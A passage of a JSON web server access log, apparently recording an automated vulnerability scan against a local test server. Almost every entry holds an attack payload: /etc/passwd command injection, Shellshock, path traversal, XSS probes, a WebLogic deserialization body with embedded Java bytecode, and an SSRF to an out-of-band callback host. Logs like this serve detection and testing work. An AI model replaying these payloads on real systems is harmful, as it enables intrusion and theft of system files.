AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.047","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.257","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9v8hs0smpv8c6ag07h0ea5gktitymrmg.oast.online&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"\x0D\x0A{\x0D\x0A 